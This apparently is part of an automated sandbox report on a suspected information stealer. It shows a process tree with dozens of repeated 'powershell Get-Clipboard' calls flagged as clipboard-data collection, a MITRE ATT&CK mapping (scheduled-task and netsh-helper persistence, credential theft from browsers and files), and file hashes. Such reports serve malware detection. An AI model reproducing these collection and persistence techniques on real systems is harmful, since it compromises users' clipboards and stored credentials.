-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:7696
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:9708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:5984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:9688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2184
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:3140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:2352 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:2880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:3912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:8232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:8628
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:6508 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:7568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:7684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5816
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:3560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:9632
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4496
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:5928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:6532
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4764
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:8004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:10408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:10676
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:8428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:1364 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:8780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:6152
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:7784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:8284 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:8644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:428
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:9596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:10872
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:8112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5712
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:9968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:7044
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:9712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:7616
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:5660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5264
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:4056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:7056
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:9228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2396
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:5820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:3588
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:10900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2536
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:4724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:6376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:2784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:10180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:6252
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5568
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:9084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:6828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:3216 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:4348
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Persistence
  Event Triggered Execution (1)
    Netsh Helper DLL (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Privilege Escalation
  Event Triggered Execution (1)
    Netsh Helper DLL (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)
Downloads
- Filesize: 2KB
  MD5: 6cf293cb4d80be23433eecf74ddb5503
  SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
  SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
  SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
- Filesize: 64B
  MD5: 446dd1cf97eaba21cf14d03aebc79f27
  SHA1: 36e4cc7367e0c7b40f4a8ace272941ea46373799
  SHA256: a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
  SHA512: a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
- Filesize: 1KB
  MD5: 8d460ce715a00afd56cda62e926b8b17
  SHA1: 3aa1ed2a3cd5e6e1a3240f222492c9e49c4eaf22
  SHA256: 195c9d4857b9486e312f80264b31ef7e9ba014ececd7731397ee75ce8d8f38cb
  SHA512: 1b9efe45bea12e59e552dcce73d597ad431aa274621d96e5a3d146e28cfb11d9f5af256f0bc986e8d4d043f6352b9410d01ddb048bd57445f544502eaf28d969
- Filesize: 944B
  MD5: 96ff1ee586a153b4e7ce8661cabc0442
  SHA1: 140d4ff1840cb40601489f3826954386af612136
  SHA256: 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
  SHA512: 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
- Filesize: 1KB
  MD5: 8a9864a3108410099b617e1548085eff
  SHA1: e86bfaf23a6c5aa554ef32f199530622b04197b0
  SHA256: db02f0618e9848668aab773d6e465cbd2dcd92c705942995dc73cef90b0941fa
  SHA512: c79cd815dad61ca4ebd1856fb76c286d7c54ad81c6988d408801650f03bd490b0da10ba8ca00f476854da0be341330f46235477e59ad7a0c0099f6b9c5d50939
- Filesize: 1KB
  MD5: 92382908106bf04aac6575ae0e55073f
  SHA1: b164dd606b60ada42fe843963f95e14e92d5d86a
  SHA256: 1332dc373efa610424b48ae9955247275f4f94cfeecec93a5121784ed8d6b3db
  SHA512: d6ee3e3776f683b2a4eaf4fd92e2cd2b9412d85fb57556130d8cabf52e180fb17b5dcdfec9ccd0b3b80bed2816c0bd2d25de35580b859e7799b7cb61071edb3f
- Filesize: 64B
  MD5: 894afb4ff3cd7ee1f69400e936f8fc9d
  SHA1: aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51
  SHA256: 20948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9
  SHA512: 449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98
- Filesize: 64B
  MD5: 3ca1082427d7b2cd417d7c0b7fd95e4e
  SHA1: b0482ff5b58ffff4f5242d77330b064190f269d3
  SHA256: 31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
  SHA512: bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
- Filesize: 1.4MB
  MD5: 56192831a7f808874207ba593f464415
  SHA1: e0c18c72a62692d856da1f8988b0bc9c8088d2aa
  SHA256: 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
  SHA512: c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33
- Filesize: 3KB
  MD5: 5b8d1d89c8465c4470051fae3404cdc6
  SHA1: 3e04f25656d33f7044a41f04de3b824a5f7d5dc2
  SHA256: 9c593cdb97fc28247bbeef8ad7f19a357a01dd76b4b1375022a0d04e9292e8f7
  SHA512: 1fc4a2ba2ca230daf2b493a7730fe7047a88308b1ba7c764ac01f103076b32a4f165d1aa0de887be9f567bb332b75e1c1909fa8c8668f898e6ca0cd0bb0ba0bb
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 728B
  MD5: 7b08ba3ef09098492b76babd5df7a9ea
  SHA1: a6efb81b940d46990ed32b24871953cdddc8c23d
  SHA256: a32357c19d6ddb59113407b1dbd486eb844f64b542262442ccfc931960a1641d
  SHA512: 4edbdaf506ac6d8767650a343208c940d83a23fe447e79e3a9a41b4180676de345372b63f0c2e56a415a3531801f2236e529079becb98f02ccc79fc813340129
- Filesize: 153KB
  MD5: f6e0ec36b6cc7188175591c15444cb67
  SHA1: 22f6cba40525a6e515ff48725a993e1235a5913f
  SHA256: d1a3694ee1c234d353976d23733d4767dae4cb2248b72c2fed8959191f922c05
  SHA512: d0c5e910f07ebbdfdb5fca5a3dcff21b9d14574624cd63926666a41d5b0edda7ce280f3c39b0bf33602cddcbab65beed0a415d745654dc671418691ea383fd48
- Filesize: 2B
  MD5: f3b25701fe362ec84616a93a45ce9998
  SHA1: d62636d8caec13f04e28442a0a6fa1afeb024bbb
  SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
  SHA512: 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
- Filesize: 300B
  MD5: ea1a0b9f3f13f08b3ed9d4a30d5512d1
  SHA1: 960da1a46b8fa0d038fd086b1e9993a56a138c99
  SHA256: ec71333d12534941d4230676b1a39629d9b7d47fdd3671f1d17ed6a9fdbc38f4
  SHA512: b3ebac57093e7eef2a488c8a9602799aca0264ee61696413fb5c6dc44d93a1189c4425bd26592547c8c0c5680c86303aa6bb1c8ff2441f312cfc75e189af47e0
- Filesize: 59B
  MD5: 2800881c775077e1c4b6e06bf4676de4
  SHA1: 2873631068c8b3b9495638c865915be822442c8b
  SHA256: 226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974
  SHA512: e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b